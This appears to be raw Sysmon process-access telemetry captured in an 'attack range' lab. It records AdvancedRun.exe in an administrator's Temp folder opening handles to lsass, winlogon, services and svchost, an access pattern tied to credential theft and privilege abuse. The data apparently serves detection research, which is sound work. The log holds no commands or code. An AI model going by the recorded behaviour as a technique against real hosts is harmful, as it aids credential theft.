18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004008567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADM